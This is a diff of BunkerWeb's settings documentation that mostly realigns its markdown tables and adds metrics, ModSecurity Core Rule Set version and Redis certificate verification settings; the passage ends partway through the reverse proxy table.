@@ -251,20 +253,20 @@ STREAM support :warning: Allow access while keeping security features based on internal and external IP/network/rDNS/ASN greylists. -| Setting |Default| Context |Multiple| Description | -|--------------------------|-------|---------|--------|----------------------------------------------------------------------------------------------| -|`USE_GREYLIST` |`no` |multisite|no |Activate greylist feature. | -|`GREYLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to put into the greylist. | -|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. | -|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. | -|`GREYLIST_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to put into the greylist. | -|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.| -|`GREYLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to put into the greylist. | -|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to put into the greylist. | -|`GREYLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. | -|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. | -|`GREYLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to put into the greylist. | -|`GREYLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to put into the greylist. 
| +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ------- | --------- | -------- | ---------------------------------------------------------------------------------------------- | +| `USE_GREYLIST` | `no` | multisite | no | Activate greylist feature. | +| `GREYLIST_IP` | | multisite | no | List of IP/network, separated with spaces, to put into the greylist. | +| `GREYLIST_IP_URLS` | | global | no | List of URLs, separated with spaces, containing good IP/network to put into the greylist. | +| `GREYLIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS greylist checks on global IP addresses. | +| `GREYLIST_RDNS` | | multisite | no | List of reverse DNS suffixes, separated with spaces, to put into the greylist. | +| `GREYLIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist. | +| `GREYLIST_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to put into the greylist. | +| `GREYLIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to put into the greylist. | +| `GREYLIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. | +| `GREYLIST_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing good User-Agent to put into the greylist. | +| `GREYLIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to put into the greylist. | +| `GREYLIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to put into the greylist. | ### Gzip 
@@ -272,12 +274,12 @@ STREAM support :x: Compress HTTP requests with the gzip algorithm. -| Setting | Default | Context |Multiple| Description | -|-----------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|-----------------------------------------------------| -|`USE_GZIP` |`no` |multisite|no |Use gzip | -|`GZIP_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with gzip.| -|`GZIP_MIN_LENGTH`|`1000` |multisite|no |Minimum length for gzip compression. | -|`GZIP_COMP_LEVEL`|`5` |multisite|no |The compression level of the gzip algorithm. 
| +| Setting | Default | Context | Multiple | Description | +| ----------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ----------------------------------------------------- | +| `USE_GZIP` | `no` | multisite | no | Use gzip | +| `GZIP_TYPES` | `application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml` | multisite | no | List of MIME types that will be compressed with gzip. | +| `GZIP_MIN_LENGTH` | `1000` | multisite | no | Minimum length for gzip compression. | +| `GZIP_COMP_LEVEL` | `5` | multisite | no | The compression level of the gzip algorithm. | ### HTML injection @@ -285,9 +287,9 @@ STREAM support :x: Inject custom HTML code before the tag. -| Setting |Default| Context |Multiple| Description | -|-------------|-------|---------|--------|------------------------| -|`INJECT_BODY`| |multisite|no |The HTML code to inject.| +| Setting | Default | Context | Multiple | Description | +| ------------- | ------- | --------- | -------- | ------------------------ | +| `INJECT_BODY` | | multisite | no | The HTML code to inject. | ### Headers 
@@ -295,22 +297,22 @@ STREAM support :x: Manage HTTP headers sent to clients. -| Setting | Default | Context |Multiple| Description | -|-------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------------------| -|`CUSTOM_HEADER` | |multisite|yes |Custom header to add (HeaderName: HeaderValue). | -|`REMOVE_HEADERS` |`Server Expect-CT X-Powered-By X-AspNet-Version X-AspNetMvc-Version` |multisite|no |Headers to remove (Header1 Header2 Header3 ...) | -|`KEEP_UPSTREAM_HEADERS` |`Content-Security-Policy Permissions-Policy Feature-Policy X-Frame-Options` |multisite|no |Headers to keep from upstream (Header1 Header2 Header3 ... or * for all). | -|`STRICT_TRANSPORT_SECURITY` |`max-age=31536000` |multisite|no |Value for the Strict-Transport-Security header. | -|`COOKIE_FLAGS` |`* HttpOnly SameSite=Lax` |multisite|yes |Cookie flags automatically added to all cookies (value accepted for nginx_cookie_flag_module).| -|`COOKIE_AUTO_SECURE_FLAG` |`yes` |multisite|no |Automatically add the Secure flag to all cookies. | -|`CONTENT_SECURITY_POLICY` |`object-src 'none'; form-action 'self'; frame-ancestors 'self';` |multisite|no |Value for the Content-Security-Policy header. 
| -|`CONTENT_SECURITY_POLICY_REPORT_ONLY`|`no` |multisite|no |Send reports for violations of the Content-Security-Policy header instead of blocking them. | -|`REFERRER_POLICY` |`strict-origin-when-cross-origin` |multisite|no |Value for the Referrer-Policy header. | -|`PERMISSIONS_POLICY` |`accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), web-share=(), xr-spatial-tracking=()` |multisite|no |Value for the Permissions-Policy header. | -|`FEATURE_POLICY` |`accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; layout-animation 'none'; legacy-image-formats 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-get 'none'; speaker-selection 'none'; sync-xhr 'none'; unoptimized-images 'none'; unsized-media 'none'; usb 'none'; screen-wake-lock 'none'; web-share 'none'; xr-spatial-tracking 'none';`|multisite|no |Value for the Feature-Policy header. | -|`X_FRAME_OPTIONS` |`SAMEORIGIN` |multisite|no |Value for the X-Frame-Options header. | -|`X_CONTENT_TYPE_OPTIONS` |`nosniff` |multisite|no |Value for the X-Content-Type-Options header. | -|`X_XSS_PROTECTION` |`1; mode=block` |multisite|no |Value for the X-XSS-Protection header. 
| +| Setting | Default | Context | Multiple | Description | +| ------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ---------------------------------------------------------------------------------------------- | +| `CUSTOM_HEADER` | | multisite | yes | Custom header to add (HeaderName: HeaderValue). | +| `REMOVE_HEADERS` | `Server Expect-CT X-Powered-By X-AspNet-Version X-AspNetMvc-Version` | multisite | no | Headers to remove (Header1 Header2 Header3 ...) | +| `KEEP_UPSTREAM_HEADERS` | `Content-Security-Policy Permissions-Policy Feature-Policy X-Frame-Options` | multisite | no | Headers to keep from upstream (Header1 Header2 Header3 ... or * for all). | +| `STRICT_TRANSPORT_SECURITY` | `max-age=31536000` | multisite | no | Value for the Strict-Transport-Security header. | +| `COOKIE_FLAGS` | `* HttpOnly SameSite=Lax` | multisite | yes | Cookie flags automatically added to all cookies (value accepted for nginx_cookie_flag_module). | +| `COOKIE_AUTO_SECURE_FLAG` | `yes` | multisite | no | Automatically add the Secure flag to all cookies. | +| `CONTENT_SECURITY_POLICY` | `object-src 'none'; form-action 'self'; frame-ancestors 'self';` | multisite | no | Value for the Content-Security-Policy header. 
| +| `CONTENT_SECURITY_POLICY_REPORT_ONLY` | `no` | multisite | no | Send reports for violations of the Content-Security-Policy header instead of blocking them. | +| `REFERRER_POLICY` | `strict-origin-when-cross-origin` | multisite | no | Value for the Referrer-Policy header. | +| `PERMISSIONS_POLICY` | `accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), web-share=(), xr-spatial-tracking=()` | multisite | no | Value for the Permissions-Policy header. | +| `FEATURE_POLICY` | `accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; layout-animation 'none'; legacy-image-formats 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-get 'none'; speaker-selection 'none'; sync-xhr 'none'; unoptimized-images 'none'; unsized-media 'none'; usb 'none'; screen-wake-lock 'none'; web-share 'none'; xr-spatial-tracking 'none';` | multisite | no | Value for the Feature-Policy header. | +| `X_FRAME_OPTIONS` | `SAMEORIGIN` | multisite | no | Value for the X-Frame-Options header. | +| `X_CONTENT_TYPE_OPTIONS` | `nosniff` | multisite | no | Value for the X-Content-Type-Options header. | +| `X_XSS_PROTECTION` | `1; mode=block` | multisite | no | Value for the X-XSS-Protection header. | ### Let's Encrypt 
@@ -318,11 +320,11 @@ STREAM support :white_check_mark: Automatic creation, renewal and configuration of Let's Encrypt certificates. -| Setting |Default| Context |Multiple| Description | -|--------------------------|-------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -|`AUTO_LETS_ENCRYPT` |`no` |multisite|no |Activate automatic Let's Encrypt mode. | -|`EMAIL_LETS_ENCRYPT` | |multisite|no |Email used for Let's Encrypt notification and in certificate. | -|`USE_LETS_ENCRYPT_STAGING`|`no` |multisite|no |Use the staging environment for Let’s Encrypt certificate generation. Useful when you are testing your deployments to avoid being rate limited in the production environment.| +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `AUTO_LETS_ENCRYPT` | `no` | multisite | no | Activate automatic Let's Encrypt mode. | +| `EMAIL_LETS_ENCRYPT` | | multisite | no | Email used for Let's Encrypt notification and in certificate. | +| `USE_LETS_ENCRYPT_STAGING` | `no` | multisite | no | Use the staging environment for Let’s Encrypt certificate generation. Useful when you are testing your deployments to avoid being rate limited in the production environment. | ### Limit 
@@ -330,15 +332,27 @@ STREAM support :warning: Limit maximum number of requests and connections. -| Setting |Default| Context |Multiple| Description | -|-----------------------|-------|---------|--------|---------------------------------------------------------------------------------------------| -|`USE_LIMIT_REQ` |`yes` |multisite|no |Activate limit requests feature. | -|`LIMIT_REQ_URL` |`/` |multisite|yes |URL (PCRE regex) where the limit request will be applied or special value / for all requests.| -|`LIMIT_REQ_RATE` |`2r/s` |multisite|yes |Rate to apply to the URL (s for second, m for minute, h for hour and d for day). | -|`USE_LIMIT_CONN` |`yes` |multisite|no |Activate limit connections feature. | -|`LIMIT_CONN_MAX_HTTP1` |`10` |multisite|no |Maximum number of connections per IP when using HTTP/1.X protocol. | -|`LIMIT_CONN_MAX_HTTP2` |`100` |multisite|no |Maximum number of streams per IP when using HTTP/2 protocol. | -|`LIMIT_CONN_MAX_STREAM`|`10` |multisite|no |Maximum number of connections per IP when using stream. | +| Setting | Default | Context | Multiple | Description | +| ----------------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- | +| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. | +| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. | +| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). | +| `USE_LIMIT_CONN` | `yes` | multisite | no | Activate limit connections feature. | +| `LIMIT_CONN_MAX_HTTP1` | `10` | multisite | no | Maximum number of connections per IP when using HTTP/1.X protocol. | +| `LIMIT_CONN_MAX_HTTP2` | `100` | multisite | no | Maximum number of streams per IP when using HTTP/2 protocol. 
| +| `LIMIT_CONN_MAX_STREAM` | `10` | multisite | no | Maximum number of connections per IP when using stream. | + +### Metrics + +STREAM support :warning: + +Metrics collection and retrieve. + +| Setting | Default | Context | Multiple | Description | +| ------------------------------ | ------- | --------- | -------- | --------------------------------------------------------- | +| `USE_METRICS` | `yes` | multisite | no | Enable collection and retrieval of internal metrics. | +| `METRICS_MEMORY_SIZE` | `16m` | global | no | Size of the internal storage for metrics. | +| `METRICS_MAX_BLOCKED_REQUESTS` | `100` | global | no | Maximum number of blocked requests to store (per worker). | ### Miscellaneous 
@@ -346,26 +360,26 @@ STREAM support :warning: Miscellaneous settings. -| Setting | Default | Context |Multiple| Description | -|-----------------------------|-----------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------| -|`DISABLE_DEFAULT_SERVER` |`no` |global |no |Close connection if the request vhost is unknown. | -|`REDIRECT_HTTP_TO_HTTPS` |`no` |multisite|no |Redirect all HTTP request to HTTPS. | -|`AUTO_REDIRECT_HTTP_TO_HTTPS`|`yes` |multisite|no |Try to detect if HTTPS is used and activate HTTP to HTTPS redirection if that's the case. | -|`ALLOWED_METHODS` |`GET|POST|HEAD` |multisite|no |Allowed HTTP and WebDAV methods, separated with pipes to be sent by clients. | -|`MAX_CLIENT_SIZE` |`10m` |multisite|no |Maximum body size (0 for infinite). | -|`SERVE_FILES` |`yes` |multisite|no |Serve files from the local folder. | -|`ROOT_FOLDER` | |multisite|no |Root folder containing files to serve (/var/www/html/{server_name} if unset). | -|`SSL_PROTOCOLS` |`TLSv1.2 TLSv1.3` |multisite|no |The supported version of TLS. We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons. | -|`HTTP2` |`yes` |multisite|no |Support HTTP2 protocol when HTTPS is enabled. | -|`LISTEN_HTTP` |`yes` |multisite|no |Respond to (insecure) HTTP requests. 
| -|`USE_OPEN_FILE_CACHE` |`no` |multisite|no |Enable open file cache feature | -|`OPEN_FILE_CACHE` |`max=1000 inactive=20s`|multisite|no |Open file cache directive | -|`OPEN_FILE_CACHE_ERRORS` |`yes` |multisite|no |Enable open file cache for errors | -|`OPEN_FILE_CACHE_MIN_USES` |`2` |multisite|no |Enable open file cache minimum uses | -|`OPEN_FILE_CACHE_VALID` |`30s` |multisite|no |Open file cache valid time | -|`EXTERNAL_PLUGIN_URLS` | |global |no |List of external plugins URLs (direct download to .zip or .tar file) to download and install (URLs are separated with space).| -|`DENY_HTTP_STATUS` |`403` |global |no |HTTP status code to send when the request is denied (403 or 444). When using 444, BunkerWeb will close the connection. | -|`SEND_ANONYMOUS_REPORT` |`yes` |global |no |Send anonymous report to BunkerWeb maintainers. | +| Setting | Default | Context | Multiple | Description | +| ----------------------------- | ----------------------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `DISABLE_DEFAULT_SERVER` | `no` | global | no | Close connection if the request vhost is unknown. | +| `REDIRECT_HTTP_TO_HTTPS` | `no` | multisite | no | Redirect all HTTP request to HTTPS. | +| `AUTO_REDIRECT_HTTP_TO_HTTPS` | `yes` | multisite | no | Try to detect if HTTPS is used and activate HTTP to HTTPS redirection if that's the case. | +| `ALLOWED_METHODS` | `GET | POST | HEAD` | multisite | no | Allowed HTTP and WebDAV methods, separated with pipes to be sent by clients. | +| `MAX_CLIENT_SIZE` | `10m` | multisite | no | Maximum body size (0 for infinite). | +| `SERVE_FILES` | `yes` | multisite | no | Serve files from the local folder. | +| `ROOT_FOLDER` | | multisite | no | Root folder containing files to serve (/var/www/html/{server_name} if unset). | +| `SSL_PROTOCOLS` | `TLSv1.2 TLSv1.3` | multisite | no | The supported version of TLS. 
We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons. | +| `HTTP2` | `yes` | multisite | no | Support HTTP2 protocol when HTTPS is enabled. | +| `LISTEN_HTTP` | `yes` | multisite | no | Respond to (insecure) HTTP requests. | +| `USE_OPEN_FILE_CACHE` | `no` | multisite | no | Enable open file cache feature | +| `OPEN_FILE_CACHE` | `max=1000 inactive=20s` | multisite | no | Open file cache directive | +| `OPEN_FILE_CACHE_ERRORS` | `yes` | multisite | no | Enable open file cache for errors | +| `OPEN_FILE_CACHE_MIN_USES` | `2` | multisite | no | Enable open file cache minimum uses | +| `OPEN_FILE_CACHE_VALID` | `30s` | multisite | no | Open file cache valid time | +| `EXTERNAL_PLUGIN_URLS` | | global | no | List of external plugins URLs (direct download to .zip or .tar file) to download and install (URLs are separated with space). | +| `DENY_HTTP_STATUS` | `403` | global | no | HTTP status code to send when the request is denied (403 or 444). When using 444, BunkerWeb will close the connection. | +| `SEND_ANONYMOUS_REPORT` | `yes` | global | no | Send anonymous report to BunkerWeb maintainers. | ### ModSecurity 
@@ -373,13 +387,14 @@ STREAM support :x: Management of the ModSecurity WAF. -| Setting | Default | Context |Multiple| Description | -|---------------------------------|--------------|---------|--------|------------------------------------------| -|`USE_MODSECURITY` |`yes` |multisite|no |Enable ModSecurity WAF. | -|`USE_MODSECURITY_CRS` |`yes` |multisite|no |Enable OWASP Core Rule Set. | -|`MODSECURITY_SEC_AUDIT_ENGINE` |`RelevantOnly`|multisite|no |SecAuditEngine directive of ModSecurity. | -|`MODSECURITY_SEC_RULE_ENGINE` |`On` |multisite|no |SecRuleEngine directive of ModSecurity. | -|`MODSECURITY_SEC_AUDIT_LOG_PARTS`|`ABCFHZ` |multisite|no |SecAuditLogParts directive of ModSecurity.| +| Setting | Default | Context | Multiple | Description | +| --------------------------------- | -------------- | --------- | -------- | ------------------------------------------ | +| `USE_MODSECURITY` | `yes` | multisite | no | Enable ModSecurity WAF. | +| `USE_MODSECURITY_CRS` | `yes` | multisite | no | Enable OWASP Core Rule Set. | +| `MODSECURITY_CRS_VERSION` | `3` | multisite | no | Version of the OWASP Core Rule Set to use. | +| `MODSECURITY_SEC_AUDIT_ENGINE` | `RelevantOnly` | multisite | no | SecAuditEngine directive of ModSecurity. | +| `MODSECURITY_SEC_RULE_ENGINE` | `On` | multisite | no | SecRuleEngine directive of ModSecurity. | +| `MODSECURITY_SEC_AUDIT_LOG_PARTS` | `ABCFHZ` | multisite | no | SecAuditLogParts directive of ModSecurity. | ### PHP 
@@ -387,12 +402,12 @@ STREAM support :x: Manage local or remote PHP-FPM. -| Setting |Default| Context |Multiple| Description | -|-----------------|-------|---------|--------|------------------------------------------------------------| -|`REMOTE_PHP` | |multisite|no |Hostname of the remote PHP-FPM instance. | -|`REMOTE_PHP_PATH`| |multisite|no |Root folder containing files in the remote PHP-FPM instance.| -|`LOCAL_PHP` | |multisite|no |Path to the PHP-FPM socket file. | -|`LOCAL_PHP_PATH` | |multisite|no |Root folder containing files in the local PHP-FPM instance. | +| Setting | Default | Context | Multiple | Description | +| ----------------- | ------- | --------- | -------- | ------------------------------------------------------------ | +| `REMOTE_PHP` | | multisite | no | Hostname of the remote PHP-FPM instance. | +| `REMOTE_PHP_PATH` | | multisite | no | Root folder containing files in the remote PHP-FPM instance. | +| `LOCAL_PHP` | | multisite | no | Path to the PHP-FPM socket file. | +| `LOCAL_PHP_PATH` | | multisite | no | Root folder containing files in the local PHP-FPM instance. | ### Real IP 
@@ -400,14 +415,14 @@ STREAM support :warning: Get real IP of clients when BunkerWeb is behind a reverse proxy / load balancer. -| Setting | Default | Context |Multiple| Description | -|--------------------|-----------------------------------------|---------|--------|--------------------------------------------------------------------------------------------------------| -|`USE_REAL_IP` |`no` |multisite|no |Retrieve the real IP of client. | -|`USE_PROXY_PROTOCOL`|`no` |multisite|no |Enable PROXY protocol communication. | -|`REAL_IP_FROM` |`192.168.0.0/16 172.16.0.0/12 10.0.0.0/8`|multisite|no |List of trusted IPs / networks, separated with spaces, where proxied requests come from. | -|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.| -|`REAL_IP_HEADER` |`X-Forwarded-For` |multisite|no |HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. | -|`REAL_IP_RECURSIVE` |`yes` |multisite|no |Perform a recursive search in the header container IP address. | +| Setting | Default | Context | Multiple | Description | +| -------------------- | ----------------------------------------- | --------- | -------- | -------------------------------------------------------------------------------------------------------- | +| `USE_REAL_IP` | `no` | multisite | no | Retrieve the real IP of client. | +| `USE_PROXY_PROTOCOL` | `no` | multisite | no | Enable PROXY protocol communication. | +| `REAL_IP_FROM` | `192.168.0.0/16 172.16.0.0/12 10.0.0.0/8` | multisite | no | List of trusted IPs / networks, separated with spaces, where proxied requests come from. | +| `REAL_IP_FROM_URLS` | | global | no | List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from. | +| `REAL_IP_HEADER` | `X-Forwarded-For` | multisite | no | HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. 
| +| `REAL_IP_RECURSIVE` | `yes` | multisite | no | Perform a recursive search in the header container IP address. | ### Redirect @@ -415,11 +430,11 @@ STREAM support :x: Manage HTTP redirects. -| Setting |Default| Context |Multiple| Description | -|-------------------------|-------|---------|--------|-------------------------------------------------| -|`REDIRECT_TO` | |multisite|no |Redirect a whole site to another one. | -|`REDIRECT_TO_REQUEST_URI`|`no` |multisite|no |Append the requested URI to the redirect address.| -|`REDIRECT_TO_STATUS_CODE`|`301` |multisite|no |Status code to send to client when redirecting. | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------- | --------- | -------- | ------------------------------------------------- | +| `REDIRECT_TO` | | multisite | no | Redirect a whole site to another one. | +| `REDIRECT_TO_REQUEST_URI` | `no` | multisite | no | Append the requested URI to the redirect address. | +| `REDIRECT_TO_STATUS_CODE` | `301` | multisite | no | Status code to send to client when redirecting. | ### Redis 
@@ -427,22 +442,23 @@ STREAM support :white_check_mark: Redis server configuration when using BunkerWeb in cluster mode. -| Setting |Default|Context|Multiple| Description | -|-------------------------|-------|-------|--------|-------------------------------------------------------------------| -|`USE_REDIS` |`no` |global |no |Activate Redis. | -|`REDIS_HOST` | |global |no |Redis server IP or hostname. | -|`REDIS_PORT` |`6379` |global |no |Redis server port. | -|`REDIS_DATABASE` |`0` |global |no |Redis database number. | -|`REDIS_SSL` |`no` |global |no |Use SSL/TLS connection with Redis server. | -|`REDIS_TIMEOUT` |`1000` |global |no |Redis server timeout (in ms) for connect, read and write. | -|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. | -|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. | -|`REDIS_USERNAME` | |global |no |Redis username used in AUTH command. | -|`REDIS_PASSWORD` | |global |no |Redis password used in AUTH command. | -|`REDIS_SENTINEL_HOSTS` | |global |no |Redis sentinel hosts with format host:[port] separated with spaces.| -|`REDIS_SENTINEL_USERNAME`| |global |no |Redis sentinel username. | -|`REDIS_SENTINEL_PASSWORD`| |global |no |Redis sentinel password. | -|`REDIS_SENTINEL_MASTER` | |global |no |Redis sentinel master name. | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------- | ------- | -------- | ------------------------------------------------------------------- | +| `USE_REDIS` | `no` | global | no | Activate Redis. | +| `REDIS_HOST` | | global | no | Redis server IP or hostname. | +| `REDIS_PORT` | `6379` | global | no | Redis server port. | +| `REDIS_DATABASE` | `0` | global | no | Redis database number. | +| `REDIS_SSL` | `no` | global | no | Use SSL/TLS connection with Redis server. | +| `REDIS_SSL_VERIFY` | `no` | global | no | Verify the certificate of Redis server. 
| +| `REDIS_TIMEOUT` | `1000` | global | no | Redis server timeout (in ms) for connect, read and write. | +| `REDIS_KEEPALIVE_IDLE` | `30000` | global | no | Max idle time (in ms) before closing redis connection in the pool. | +| `REDIS_KEEPALIVE_POOL` | `10` | global | no | Max number of redis connection(s) kept in the pool. | +| `REDIS_USERNAME` | | global | no | Redis username used in AUTH command. | +| `REDIS_PASSWORD` | | global | no | Redis password used in AUTH command. | +| `REDIS_SENTINEL_HOSTS` | | global | no | Redis sentinel hosts with format host:[port] separated with spaces. | +| `REDIS_SENTINEL_USERNAME` | | global | no | Redis sentinel username. | +| `REDIS_SENTINEL_PASSWORD` | | global | no | Redis sentinel password. | +| `REDIS_SENTINEL_MASTER` | | global | no | Redis sentinel master name. | ### Reverse proxy 
@@ -450,34 +466,34 @@ STREAM support :warning: Manage reverse proxy configurations. -| Setting | Default | Context |Multiple| Description | -|---------------------------------------|----------------------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------| -|`USE_REVERSE_PROXY` |`no` |multisite|no |Activate reverse proxy mode. | -|`REVERSE_PROXY_INTERCEPT_ERRORS` |`yes` |multisite|no |Intercept and rewrite errors. | -|`REVERSE_PROXY_HOST` | |multisite|yes |Full URL of the proxied resource (proxy_pass). | -|`REVERSE_PROXY_URL` | |multisite|yes |Location URL that will be proxied. | -|`REVERSE_PROXY_WS` |`no` |multisite|yes |Enable websocket on the proxied resource. | -|`REVERSE_PROXY_HEADERS` | |multisite|yes |List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). | -|`REVERSE_PROXY_HEADERS_CLIENT` | |multisite|yes |List of HTTP headers to send to client separated with semicolons (values for add_header directive). | -|`REVERSE_PROXY_BUFFERING` |`yes` |multisite|yes |Enable or disable buffering of responses from proxied resource. | -|`REVERSE_PROXY_KEEPALIVE` |`no` |multisite|yes |Enable or disable keepalive connections with the proxied resource. | -|`REVERSE_PROXY_AUTH_REQUEST` | |multisite|yes |Enable authentication using an external provider (value of auth_request directive). | -|`REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL`| |multisite|yes |Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). | -|`REVERSE_PROXY_AUTH_REQUEST_SET` | |multisite|yes |List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives).| -|`USE_PROXY_CACHE` |`no` |multisite|no |Enable or disable caching of the proxied resources. | -|`PROXY_CACHE_PATH_LEVELS` |`1:2` |global |no |Hierarchy levels of the cache. 
| -|`PROXY_CACHE_PATH_ZONE_SIZE` |`10m` |global |no |Maximum size of cached metadata when caching proxied resources. | -|`PROXY_CACHE_PATH_PARAMS` |`max_size=100m` |global |no |Additional parameters to add to the proxy_cache directive. | -|`PROXY_CACHE_METHODS` |`GET HEAD` |multisite|no |HTTP methods that should trigger a cache operation. | -|`PROXY_CACHE_MIN_USES` |`2` |multisite|no |The minimum number of requests before a response is cached. | -|`PROXY_CACHE_KEY` |`$scheme$host$request_uri` |multisite|no |The key used to uniquely identify a cached response. | -|`PROXY_CACHE_VALID` |`200=24h 301=1h 302=24h` |multisite|no |Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. | -|`PROXY_NO_CACHE` |`$http_pragma $http_authorization`|multisite|no |Conditions to disable caching of responses. | -|`PROXY_CACHE_BYPASS` |`0` |multisite|no |Conditions to bypass caching of responses. | -|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. | -|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. | -|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. | -|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. | +| Setting | Default | Context | Multiple | Description | +| --------------------------------------- | ---------------------------------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `USE_REVERSE_PROXY` | `no` | multisite | no | Activate reverse proxy mode. | +| `REVERSE_PROXY_INTERCEPT_ERRORS` | `yes` | multisite | no | Intercept and rewrite errors. | +| `REVERSE_PROXY_HOST` | | multisite | yes | Full URL of the proxied resource (proxy_pass). 
